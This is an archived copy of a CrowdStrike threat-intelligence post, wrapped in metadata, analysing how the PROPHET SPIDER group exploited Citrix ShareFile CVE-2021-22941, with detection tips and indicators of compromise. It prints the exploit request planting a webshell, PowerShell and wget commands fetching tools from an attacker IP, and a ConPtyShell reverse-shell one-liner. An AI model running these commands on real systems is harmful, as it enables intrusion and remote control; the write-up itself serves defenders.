{
	"id": "97c4622f-58e6-4180-a053-dd855cb5e2a2",
	"created_at": "2026-04-06T00:15:59.634558Z",
	"updated_at": "2026-04-10T03:28:33.60118Z",
	"deleted_at": null,
	"sha1_hash": "7c50cf1ca0b5c172eb3762ecc09631891b807544",
	"title": "PROPHET SPIDER Exploits Citrix ShareFile | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 85189,
	"plain_text": "PROPHET SPIDER Exploits Citrix ShareFile | CrowdStrike\r\nBy Chris Nguyen - Eric Loui\r\nArchived: 2026-04-05 17:47:29 UTC\r\nAt the start of 2022, CrowdStrike Intelligence and CrowdStrike Services investigated an incident in which PROPHET\r\nSPIDER exploited CVE-2021-22941 — a remote code execution (RCE) vulnerability impacting Citrix ShareFile Storage\r\nZones Controller — to compromise a Microsoft Internet Information Services (IIS) web server. The adversary exploited the\r\nvulnerability to deploy a webshell that enabled the downloading of additional tools. This incident highlights how PROPHET\r\nSPIDER continues to evolve their tradecraft while continuing to exploit known web-server vulnerabilities.\r\nBackground\r\nPROPHET SPIDER\r\nPROPHET SPIDER is an eCrime actor, active since at least May 2017, that primarily gains access to victims by\r\ncompromising vulnerable web servers, which commonly involves leveraging a variety of publicly disclosed vulnerabilities.\r\nThe adversary has likely functioned as an access broker — handing off access to a third party to deploy ransomware — in\r\nmultiple instances.\r\nCVE-2021-22941\r\nIn September 2021, Citrix disclosed a relative path-traversal vulnerability in ShareFile Zones Storage Controller, designated\r\nCVE-2021-22941. Shortly thereafter, security researchers demonstrated a proof-of-concept (POC) exploit for the CVE.\r\nBased on the known technical details, others were able to reproduce fully weaponized exploits for CVE-2021-22941 that\r\nhave proliferated since mid-October 2021. The vulnerability allows an adversary to overwrite an existing file on a target\r\nserver via an uploadid parameter passed in an HTTP GET request.\r\nInitial Access and Exploitation\r\nOn Jan. 10, 2022, PROPHET SPIDER sent an HTTP POST request to an IIS server of a CrowdStrike Falcon®® platform\r\ncustomer, using the user agent python-requests/2.26.0. The request to /upload.aspx contained the following command:\r\nPOST /upload.aspx?\r\nuploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+\r\nThere are three key components to this request.\r\nThe URI endpoint /upload.aspx is used for ShareFile uploads and usually comes with parameters to define upload object\r\nspecifications, such as uploadid, cid or batchid. In this case, the uploadid parameter contained a webshell:\r\nuploadid=@using+System.Diagnostics;@{int+idx0=+0;string+str_idx0+=+idx0.ToString();+int+idx1+=+1;string+str_idx1+=+idx1.ToString();strin\r\nThis is content that the exploit will write to an ASP.NET file; it uses Razor syntax, where @\u003ckeyword\u003e allows a keyword to\r\nbe used as a variable name, and @{ is used to open a C# code block. The C# Process.Start(cmd,arg); method provides the\r\nbackdoor function that will be used to execute arbitrary commands.\r\n/../../ConfigService\\Views\\Shared\\Error.cshtml\r\nThis is the relative path traversal that will allow the payload to overwrite the legitimate Error.cshtml page.\r\nbp=123\u0026accountid=123\r\nThese are parameters that are expected by the upload function and included to prevent an error from occurring. Additionally,\r\nthese values match the default characters used in the previously mentioned publicly available CVE-2021-22941 exploit.\r\nAnalysts looking for evidence of attempted CVE-2021-22941 exploitation can examine IIS access logs for web requests\r\nthat:\r\nTarget upload.aspx\r\nContain encoded strings for ../ and ConfigService\\Views\\Shared\\Error.cshtml in the URL parameters\r\nMay contain \u0026bp=123\u0026accountid=123 if the attacker has not customized the payload\r\nOnce the webshell is set, it can be accessed by sending an HTTP request to /configservice/Home/Error with one or two URL\r\nparameters. ASP.NET will direct these requests to Error.cshtml, which usually contains a simple HTML header saying\r\n“Sorry, an error occurred while processing your request.” Due to the exploit, the contents have been replaced with the C#\r\ncode block and will invoke Process.Start(cmd.arg) using the URL parameter(s) passed in the GET request.\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/\r\nPage 1 of 3\n\nPost-exploitation Commands \r\nAfter achieving initial access, PROPHET SPIDER used the following command to test connectivity:\r\nCMD.exe /C nslookup xab8v404gwftvw5nvw95ig6ybphf54.burpcollaborator[.]net\u003c/code\r\nIf successful, this command performs a name lookup on a subdomain of burpcollaborator[.]net, which the open-source\r\nvulnerability-testing tool BurpSuite can check to confirm responding systems.\r\nThe adversary next attempted to execute encoded PowerShell commands that decoded to:\r\npowershell -Command (New-Object\r\nSystem.Net.WebClient).DownloadFile ('http[:]//45.61.136[.]39:443/wget[.]bin','C:\\Windows\\temp\\wget.bin')\r\ncmd /c c:\\Windows\\temp\\wget.bin -t 1 http[:]//45.61.136[.]39:443/winn.exe -O c:\\windows\\temp\\wi.exe\r\nThese commands attempted to download the legitimate wget utility from a remote IP address, then attempted to use wget to\r\ndownload another remote binary, named winn.exe. The winn.exe download was unsuccessful. The adversary then attempted\r\nto install an open-source reverse shell from GitHub:\r\npowershell -Command IEX(IWR https[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing) ; Invoke-ConPtyShell -RemoteIp 107.181.187[.]184 -RemotePort 4242 -Rows 44 -\r\nCols 166\r\nThis payload attempted to load the ConPtyShell reverse shell directly from GitHub, with parameters to connect back to the\r\nIP address 107.181.187[.]184 over TCP port 4242.\r\nConclusion\r\nAs CrowdStrike Intelligence previously reported, PROPHET SPIDER is an opportunistic eCrime actor that exploits publicly\r\ndisclosed server vulnerabilities, often to deliver webshells. This recent CVE-2021-22941 exploitation demonstrates the\r\nadversary’s willingness to operationalize new and different exploit code, as well as their enduring preference for deploying\r\nthe wget utility to begin operations.\r\nIndicators of Compromise (IOCs)\r\nDescription IP Addresses\r\nSite hosting wget.bin and\r\nwinn.exe\r\n45.61.136\u003c.\u003e39\r\nCallback destination for\r\nConPtyShell reverse shell\r\n107.181.187\u003c.\u003e184\r\nSource observed exploiting CVE-2021-22941\r\n188.119.149\u003c.\u003e160\r\nSite hosting ConPtyShell reverse\r\nshell\r\nhxxps\u003c:\u003e//raw.githubusercontent\u003c.\u003ecom /antonioCoco/ConPtyShell/master\r\n/Invoke-ConPtyShell.ps1\r\nMITRE ATT\u0026CK® Observed Tactics\r\nTactic Description\r\nInitial Access T1190: Exploit Public Facing Application\r\nExecution T1059.001: Command and Scripting Interpreter: PowerShell\r\nPersistence T1505.003: Server Software Component: Web Shell\r\nCommand and Control T1071: Application Layer Protocol\r\n  T1105: Ingress Tool Transfer\r\nAdditional Resources\r\nRead more about CrowdStrike’s observations of PROPHET SPIDER activity in this blog: PROPHET SPIDER\r\nExploits Oracle WebLogic to Facilitate Ransomware Activity.\r\nTo learn more about how to incorporate intelligence on threat actors into your security strategy, visit the\r\nCROWDSTRIKE FALCON® INTELLIGENCE™ Premium Threat Intelligence page.\r\nVisit the CrowdStrike website to learn more about CrowdStrike Services.\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/\r\nPage 2 of 3\n\nGet a full-featured free trial of CrowdStrike Falcon® Prevent™ and learn how true next-gen AV performs against\r\ntoday’s most sophisticated threats.\r\nSource: https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/"
	],
	"report_names": [
		"prophet-spider-exploits-citrix-sharefile"
	],
	"threat_actors": [
		{
			"id": "056826cb-6e17-4954-a9b4-2cc8c6ae3cb8",
			"created_at": "2023-03-04T02:01:54.115678Z",
			"updated_at": "2026-04-10T02:00:03.360898Z",
			"deleted_at": null,
			"main_name": "Prophet Spider",
			"aliases": [
				"GOLD MELODY",
				"UNC961"
			],
			"source_name": "MISPGALAXY:Prophet Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "47b52642-e5b8-4502-b714-b625002d86aa",
			"created_at": "2024-06-19T02:03:08.086579Z",
			"updated_at": "2026-04-10T02:00:03.812509Z",
			"deleted_at": null,
			"main_name": "GOLD MELODY",
			"aliases": [
				"PROPHET SPIDER",
				"UNC961"
			],
			"source_name": "Secureworks:GOLD MELODY",
			"tools": [
				"7-Zip",
				"AUDITUNNEL",
				"BURP Suite",
				"GOTROJ",
				"JSP webshells",
				"Mimikatz",
				"Wget"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434559,
	"ts_updated_at": 1775791713,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7c50cf1ca0b5c172eb3762ecc09631891b807544.pdf",
		"text": "https://archive.orkl.eu/7c50cf1ca0b5c172eb3762ecc09631891b807544.txt",
		"img": "https://archive.orkl.eu/7c50cf1ca0b5c172eb3762ecc09631891b807544.jpg"
	}
}